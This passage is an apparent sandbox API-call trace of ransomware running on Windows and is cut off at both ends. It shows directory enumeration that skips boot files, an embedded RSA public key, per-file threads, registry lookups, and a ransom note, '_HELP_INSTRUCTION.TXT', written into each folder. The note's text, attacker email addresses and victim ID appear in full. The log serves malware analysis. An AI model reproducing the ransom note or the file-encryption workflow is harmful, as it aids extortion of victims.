lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0161.809] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x21c [0161.810] Sleep (dwMilliseconds=0x96) [0161.965] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0161.965] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="..") returned 1 [0161.965] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".") returned 1 [0161.965] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0161.965] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="ntldr") returned 0x0 [0161.965] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="NTLDR") returned 0x0 [0161.965] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="NTDETECT.COM") returned 0x0 [0161.965] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="ntdetect.com") returned 0x0 [0161.965] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0161.965] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") [0161.965] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0161.965] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0161.965] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0161.965] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x220 [0161.966] Sleep (dwMilliseconds=0x96) [0162.120] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0162.120] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="..") returned 1 [0162.121] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".") returned 1 [0162.121] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0162.121] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="ntldr") returned 0x0 [0162.121] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="NTLDR") returned 0x0 [0162.121] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="NTDETECT.COM") returned 0x0 [0162.121] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="ntdetect.com") returned 0x0 [0162.121] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0162.121] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") [0162.121] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0162.121] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0162.121] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0162.121] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1f4 [0162.122] Sleep (dwMilliseconds=0x96) [0162.276] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0162.276] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0162.276] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0162.277] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0162.277] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0162.277] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0162.277] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0162.277] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0162.277] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0162.277] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0162.277] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0162.277] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0162.277] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0162.277] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0 [0162.277] FindClose (in: hFindFile=0x43723f8 | out: hFindFile=0x43723f8) returned 1 [0162.277] FindClose (in: hFindFile=0x43723f8 | out: hFindFile=0x43723f8) returned 0 [0162.277] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0162.277] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0162.277] SetErrorMode (uMode=0x1) returned 0x1 [0162.277] wsprintfW (in: param_1=0x17d57c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_HELP_INSTRUCTION.TXT") returned 51 [0162.278] GetUserNameW (in: lpBuffer=0x17b358, pcbBuffer=0x17b144 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17b144) returned 1 [0162.278] wsprintfW (in: param_1=0x17b150, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0162.278] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17b14c | out: phkResult=0x17b14c*=0x1e4) returned 0x0 [0162.278] RegQueryValueExW (in: hKey=0x1e4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4694b0, lpcbData=0x17b148*=0x104 | out: lpType=0x0, lpData=0x4694b0*=0x65, lpcbData=0x17b148*=0x4a) returned 0x0 [0162.278] RegCloseKey (hKey=0x1e4) returned 0x0 [0162.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17c57c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0162.278] wsprintfW (in: param_1=0x17b57c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0162.278] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0162.278] CloseHandle (hObject=0x1e4) returned 1 [0162.279] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x43723f8 [0162.279] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="5p5NrGJn0jS HALPmcxz" [0162.279] lstrcpyW (in: lpString1=0x17d784, lpString2="5p5NrGJn0jS HALPmcxz" | out: lpString1="5p5NrGJn0jS HALPmcxz") returned="5p5NrGJn0jS HALPmcxz" [0162.279] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0162.279] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0162.279] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0162.279] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0162.279] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0162.279] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0162.279] lstrcmpW (lpString1="AppData", lpString2="..") returned 1 [0162.279] lstrcmpW (lpString1="AppData", lpString2=".") returned 1 [0162.279] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0162.279] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0162.279] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="AppData" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" [0162.279] SetErrorMode (uMode=0x1) returned 0x1 [0162.279] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" [0162.279] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\" [0162.279] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\" [0162.279] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*" [0162.279] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0162.280] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="AppData" [0162.280] lstrcpyW (in: lpString1=0x17c6e4, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0162.280] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0162.280] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" [0162.280] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*" [0162.280] SetErrorMode (uMode=0x1) returned 0x1 [0162.280] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\_HELP_INSTRUCTION.TXT") returned 59 [0162.280] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0162.280] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0162.280] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x1e8) returned 0x0 [0162.280] RegQueryValueExW (in: hKey=0x1e8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4696e0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x4696e0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0162.280] RegCloseKey (hKey=0x1e8) returned 0x0 [0162.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0162.280] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0162.281] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0162.281] CloseHandle (hObject=0x1e8) returned 1 [0162.281] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0162.281] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData") returned="AppData" [0162.281] lstrcpyW (in: lpString1=0x17c6e4, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0162.281] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0162.281] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0162.282] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0162.282] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0162.282] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0162.282] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0162.282] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Application Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" [0162.282] SetErrorMode (uMode=0x1) returned 0x1 [0162.282] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" [0162.282] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\" [0162.282] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\" [0162.282] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*" [0162.282] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0162.282] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0162.283] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data" [0162.283] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*" [0162.283] SetErrorMode (uMode=0x1) returned 0x1 [0162.283] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\_HELP_INSTRUCTION.TXT") returned 68 [0162.283] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0162.283] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0162.283] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x1e8) returned 0x0 [0162.283] RegQueryValueExW (in: hKey=0x1e8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x469910, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x469910*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0162.283] RegCloseKey (hKey=0x1e8) returned 0x0 [0162.284] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0162.284] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0162.284] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0162.284] CloseHandle (hObject=0x1e8) returned 1 [0162.284] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0162.284] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0162.284] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0162.284] lstrcmpW (lpString1="Contacts", lpString2="..") returned 1 [0162.284] lstrcmpW (lpString1="Contacts", lpString2=".") returned 1 [0162.284] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS 